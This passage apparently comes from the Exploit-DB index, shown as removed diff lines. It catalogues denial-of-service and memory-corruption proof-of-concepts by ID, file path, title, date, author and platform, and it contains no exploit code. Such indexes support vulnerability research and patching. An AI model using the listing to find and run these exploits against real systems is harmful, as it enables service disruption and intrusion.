-38789,exploits/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos, -38791,exploits/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos, -38793,exploits/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos, -38794,exploits/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos, -38795,exploits/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos, -38796,exploits/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos, -38798,exploits/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos, -38854,exploits/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos, -38857,exploits/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos, -38858,exploits/windows/dos/38858.txt,"Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",windows,dos, -38878,exploits/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)",2015-12-06,Un_N0n,windows,dos, -38909,exploits/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",linux,dos, -38916,exploits/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos, -38917,exploits/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos, -38930,exploits/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos, -38931,exploits/multiple/dos/38931.txt,"Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos, -38932,exploits/multiple/dos/38932.txt,"Avast! - JetDb::Ised4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos, -38933,exploits/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos, -38934,exploits/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos, -38939,exploits/multiple/dos/38939.c,"VideoLAN VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos, -38940,exploits/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos, -39095,exploits/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos, -38969,exploits/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos, -38970,exploits/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos, -38972,exploits/windows/dos/38972.html,"Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",windows,dos, -38978,exploits/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",windows,dos,11460 -38979,exploits/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",windows,dos,11460 -38980,exploits/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",windows,dos,11460 -38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -38994,exploits/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",multiple,dos, -38995,exploits/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos, -38996,exploits/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos, -38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -38998,exploits/multiple/dos/38998.txt,"Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV",2015-12-16,"Google Security Research",multiple,dos, -38999,exploits/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",multiple,dos, -39000,exploits/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -39001,exploits/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos, -39002,exploits/multiple/dos/39002.txt,"Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free",2015-12-16,"Google Security Research",multiple,dos, -39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos, -39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos, -39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos, -39019,exploits/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos, -39020,exploits/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos, -39021,exploits/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos, -39022,exploits/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos, -40105,exploits/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos, -40104,exploits/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos, -39025,exploits/windows/dos/39025.txt,"Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos, -39026,exploits/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos, -39027,exploits/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos, -39037,exploits/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos, -39039,exploits/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos, -39040,exploits/windows/dos/39040.txt,"Adobe Flash MovieClip.attachBitmap - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39041,exploits/windows/dos/39041.txt,"Adobe Flash MovieClip.startDrag - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39042,exploits/windows/dos/39042.txt,"Adobe Flash MovieClip.duplicateMovieClip - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39043,exploits/win_x86-64/dos/39043.txt,"Adobe Flash Selection.SetSelection - Use-After-Free",2015-12-18,"Google Security Research",win_x86-64,dos, -39044,exploits/windows/dos/39044.txt,"Adobe Flash TextField.sharpness Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39045,exploits/windows/dos/39045.txt,"Adobe Flash TextField.thickness Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39046,exploits/windows/dos/39046.txt,"Adobe Flash TextField.setFormat - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39047,exploits/windows/dos/39047.txt,"Adobe Flash TextField.replaceSel - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39048,exploits/windows/dos/39048.txt,"Adobe Flash TextField.replaceText - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39049,exploits/windows/dos/39049.txt,"Adobe Flash - 'TextField' Use-After Free",2015-12-18,"Google Security Research",windows,dos, -39050,exploits/windows/dos/39050.txt,"Adobe Flash - TextField.Variable Setter Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39051,exploits/windows/dos/39051.txt,"Adobe Flash TextField.htmlText Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39052,exploits/windows/dos/39052.txt,"Adobe Flash TextField.type Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39053,exploits/windows/dos/39053.txt,"Adobe Flash TextField.text Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39054,exploits/windows/dos/39054.txt,"Adobe Flash TextField.tabIndex Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39055,exploits/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39056,exploits/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos, -39067,exploits/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos, -39070,exploits/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,windows,dos, -39072,exploits/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win_x86-64,dos, -39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",cgi,dos, -39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos, -39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",multiple,dos, -39082,exploits/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",multiple,dos, -39091,exploits/php/dos/39091.pl,"WHMCompleteSolution (WHMCS) 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos, -39092,exploits/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos, -39103,exploits/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos, -39125,exploits/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos, -39144,exploits/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos, -39225,exploits/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",hardware,dos, -39226,exploits/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",windows,dos, -39158,exploits/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - Denial of Service",2016-01-03,Vishnu,windows,dos, -39162,exploits/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos, -39163,exploits/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos, -39164,exploits/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos, -39165,exploits/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos, -39169,exploits/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos, -39177,exploits/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos, -39180,exploits/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos, -39181,exploits/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos, -39182,exploits/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos, -39183,exploits/windows/dos/39183.py,"ALLPlayer - '.wav' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos, -39373,exploits/osx/dos/39373.c,"Apple Mac OSX Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos, -39208,exploits/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos, -39216,exploits/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash (PoC)",2016-01-11,"Mohammad Reza Espargham",windows,dos, -39219,exploits/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos, -39220,exploits/windows/dos/39220.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (1)",2016-01-11,"Google Security Research",windows,dos, -39221,exploits/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos, -39229,exploits/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos, -39232,exploits/windows/dos/39232.txt,"Microsoft Windows - devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos, -39233,exploits/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos, -39242,exploits/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos, -39371,exploits/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos, -39372,exploits/osx/dos/39372.c,"Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos, -39274,exploits/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 -39275,exploits/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos, -39305,exploits/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos, -39375,exploits/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos, -39308,exploits/linux/dos/39308.c,"Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos, -39315,exploits/hardware/dos/39315.pl,"Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos, -39321,exploits/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39322,exploits/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39323,exploits/multiple/dos/39323.txt,"Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39324,exploits/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos, -39325,exploits/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos, -39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos, -39330,exploits/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos, -39331,exploits/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,windows,dos, -39353,exploits/windows/dos/39353.txt,"VideoLAN VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",windows,dos, -39357,exploits/osx/dos/39357.txt,"Apple Mac OSX / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos, -39358,exploits/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution Vulnerabilities",2016-01-28,"Google Security Research",multiple,dos, -39359,exploits/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39360,exploits/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39361,exploits/ios/dos/39361.txt,"iOS Kernel - AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39362,exploits/ios/dos/39362.txt,"iOS Kernel - AppleOscarCMA Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39363,exploits/ios/dos/39363.txt,"iOS Kernel - IOHIDEventService Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39364,exploits/ios/dos/39364.txt,"iOS Kernel - IOReportHub Use-After-Free",2016-01-28,"Google Security Research",ios,dos, -39365,exploits/multiple/dos/39365.c,"Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos, -39366,exploits/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos, -39367,exploits/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos, -39368,exploits/osx/dos/39368.c,"Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos, -39369,exploits/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos, -39370,exploits/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos, -39376,exploits/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos, -39377,exploits/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos, -39378,exploits/multiple/dos/39378.c,"Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos, -39379,exploits/multiple/dos/39379.txt,"Apple Mac OSX / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos, -39380,exploits/osx/dos/39380.c,"Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient NULL Dereference",2016-01-28,"Google Security Research",osx,dos, -39381,exploits/osx/dos/39381.c,"Apple Mac OSX - 'IOHDIXControllerUserClient::convertClient' Buffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos, -39393,exploits/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos, -39395,exploits/windows/dos/39395.txt,"WPS Office < 2016 - '.ppt' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos, -39396,exploits/windows/dos/39396.txt,"WPS Office < 2016 - '.doc' OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos, -39397,exploits/windows/dos/39397.txt,"WPS Office < 2016 - '.ppt' drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos, -39398,exploits/windows/dos/39398.txt,"WPS Office < 2016 - '.xls' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos, -39400,exploits/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos, -39401,exploits/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos, -39403,exploits/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow",2016-02-03,LiquidWorm,windows,dos, -39406,exploits/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos, -39424,exploits/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos, -39425,exploits/android/dos/39425.txt,"Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption",2016-02-08,"Google Security Research",android,dos, -39426,exploits/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos, -39428,exploits/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos, -39429,exploits/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos, -39430,exploits/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos, -39431,exploits/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos, -39444,exploits/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos, -39445,exploits/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos, -39447,exploits/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos, -39452,exploits/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos, -39454,exploits/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos, -39460,exploits/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos, -39461,exploits/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos, -39462,exploits/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos, -39463,exploits/multiple/dos/39463.txt,"Adobe Flash - LoadVars.decode Use-After-Free",2016-02-17,"Google Security Research",multiple,dos, -39464,exploits/multiple/dos/39464.txt,"Adobe Flash - H264 Parsing Out-of-Bounds Read",2016-02-17,"Google Security Research",multiple,dos, -39465,exploits/multiple/dos/39465.txt,"Adobe Flash - ATF Processing Heap Overflow",2016-02-17,"Google Security Research",multiple,dos, -39466,exploits/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",multiple,dos, -39467,exploits/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos, -39470,exploits/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",windows,dos, -39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (SEH) (Denial of Service)",2016-02-19,"Shantanu Khandelwal",windows,dos, -39472,exploits/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service",2016-02-19,"Shantanu Khandelwal",windows,dos, -39475,exploits/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos, -39476,exploits/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos, -39482,exploits/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos, -39483,exploits/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos, -39484,exploits/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos, -39487,exploits/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos, -39490,exploits/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos, -39491,exploits/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos, -39492,exploits/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos, -39493,exploits/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos, -39494,exploits/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos, -39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",linux,dos, -39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos, -39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos, -39505,exploits/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos, -39509,exploits/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos, -39512,exploits/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos, -39516,exploits/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 -39517,exploits/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 -39518,exploits/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,windows,dos, -39529,exploits/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos, -39530,exploits/windows/dos/39530.txt,"Avast! - Authenticode Parsing Memory 